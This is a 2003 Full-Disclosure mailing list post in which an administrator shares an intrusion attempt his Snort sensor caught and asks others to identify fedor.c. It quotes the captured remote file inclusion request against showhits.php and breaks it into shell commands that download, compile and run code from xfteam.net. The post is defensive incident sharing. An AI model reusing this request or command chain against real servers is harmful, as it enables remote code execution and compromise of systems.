[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
- To: full-disclosure@lists.netsys.com
- Subject: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
- From: Dan <dan@lockedbox.net>
- Date: Mon, 24 Nov 2003 09:28:22 +0000
Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir its attempting to access has not been
there for over 4 months(/logjam/)?
Has anyone actually seen what this fedor.c is? I have done some google'ing but
it comes up blank.
Has anyone else noticed this kindof request recently?
Is it just me or is xfteam.net not resolving anyway?
Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f
Regards,
Daniel.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html